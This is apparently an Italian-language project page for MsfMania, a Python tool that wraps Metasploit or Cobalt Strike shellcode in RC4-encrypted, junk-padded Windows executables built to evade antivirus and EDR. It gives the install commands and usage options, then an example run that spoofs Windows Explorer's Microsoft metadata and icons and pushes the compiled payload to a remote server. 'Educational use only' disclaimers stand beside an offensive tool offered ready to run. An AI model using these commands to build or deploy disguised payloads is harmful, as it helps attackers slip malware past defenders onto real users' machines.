
Strumenti di evasione AV in Python
MsfMania è un framework avanzato di offuscamento dei payload basato su Python, progettato per eludere la rilevazione EDR/AV sui sistemi Windows. Genera eseguibili altamente polimorfi tramite generazione dinamica del codice, crittografia multi-livello (RC4) e spoofing dei metadati binari.
⚠️ Solo a scopo educativo - Questo strumento è progettato per test di sicurezza autorizzati e scopi di ricerca.
git clone https://github.com/lepotekil/MsfMania.gitcd MsfManiadocker build -t msfmania:latest .# docker run --rm -v "$(pwd):/app/output" msfmania:latest
███╗ ███╗███████╗███████╗███╗ ███╗ █████╗ ███╗ ██╗██╗ █████╗
████╗ ████║██╔════╝██╔════╝████╗ ████║██╔══██╗████╗ ██║██║██╔══██╗
██╔████╔██║███████╗█████╗ ██╔████╔██║███████║██╔██╗ ██║██║███████║
██║╚██╔╝██║╚════██║██╔══╝ ██║╚██╔╝██║██╔══██║██║╚██╗██║██║██╔══██║
██║ ╚═╝ ██║███████║██║ ██║ ╚═╝ ██║██║ ██║██║ ╚████║██║██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝╚═╝ ╚═╝
Version : 3.0.1 - Author : Killian CASAROTTO - Updated : 10/14/2025
usage: main.py [-h] -p PAYLOAD -o OUTPUT [-k {1,2,3}] [-s]
[--spoof-bin TARGET_EXE] [-j JUNKCODES]
options:
-h, --help mostra questo messaggio di aiuto ed esce
-p, --payload PAYLOAD
Seleziona il file payload da utilizzare (es: cobalt64.bin)
-o, --output OUTPUT Percorso di output incluso il nome file (es:
/path/to/output/payload)
-k, --keysize {1,2,3}
Dimensione della chiave RC4 in byte (1-3)
-s, --strip Strippa l'eseguibile
--spoof-bin TARGET_EXE
Spoofa i metadati binari dall'eseguibile target (es:
assets/bins/bitsadmin_11-21H2_KB5032192.exe)
-j, --junkcodes JUNKCODES
Numero di junkcode da iniettare (default: 0)
# docker run --rm -v "$(pwd):/app/output" msfmania:latest python3 main.py -p msfmania/assets/bins/win_x64_msgbox_msfvenom_20251010.bin -o output/payload_test_$(date +%s) --keysize 3 --spoof-bin assets/bins/explorer_11-24H2_KB5065789.exe --junkcodes 1000
███╗ ███╗███████╗███████╗███╗ ███╗ █████╗ ███╗ ██╗██╗ █████╗
████╗ ████║██╔════╝██╔════╝████╗ ████║██╔══██╗████╗ ██║██║██╔══██╗
██╔████╔██║███████╗█████╗ ██╔████╔██║███████║██╔██╗ ██║██║███████║
██║╚██╔╝██║╚════██║██╔══╝ ██║╚██╔╝██║██╔══██║██║╚██╗██║██║██╔══██║
██║ ╚═╝ ██║███████║██║ ██║ ╚═╝ ██║██║ ██║██║ ╚████║██║██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝╚═╝ ╚═╝
Version : 3.0.1 - Author : Killian CASAROTTO - Updated : 10/14/2025
[~] Avvio della crittografia dello shellcode (dimensione chiave: 3)
[~] Compressione dello shellcode (303 byte)
[+] Shellcode compresso a 284 byte
[~] Crittografia con RC4 modificato
[+] Crittografia completata: 284 byte (b64: 380 byte)
[~] Iniezione di 1000 junkcode...
[~] Trovati 27 punti di iniezione in main()
[~] Creati 973 punti di iniezione aggiuntivi
[+] Inserite 1000/1000 chiamate a funzione
[+] 1000 junkcode iniettati con successo
[+] Iniettati con successo 1000 junkcode
[~] Applicazione dell'offuscamento...
[+] 145 identificatori offuscati
[~] Estrazione dei metadati da: assets/bins/explorer_11-24H2_KB5065789.exe
[+] Metadati estratti:
Descrizione: Windows Explorer
Versione: 10.0.26100.6725 (WinBuild.160101.0800)
Azienda: Microsoft Corporation
Prodotto: Microsoft® Windows® Operating System
[~] Trovati 23 gruppi di icone con 181 icone
[+] Estratte 26 icone uniche da 181 totali
[+] Estratte 26 icone
[~] Compilazione in: /app/output/output/payload_test_1760467840.exe
[~] Compilazione del file risorsa: /tmp/payload_test_1760467840.rc
[+] File risorsa compilato: /tmp/payload_test_1760467840.res
[+] Compilazione riuscita: /app/output/output/payload_test_1760467840.exe
[+] Dimensione binario: 405ko
[+] Codice sorgente C copiato in: /app/output/examples/main.c
[*] Distribuzione al server remoto...
[+] Payload distribuito con successo
⚠️ IMPORTANTE: Questo progetto è solo per scopi educativi e di test di sicurezza autorizzati.
Questo progetto è concesso in licenza con la licenza MIT - consulta il file LICENSE per i dettagli.
MsfMania |
Log di esecuzione del payload |
Risultati di rilevazione VirusTotal | |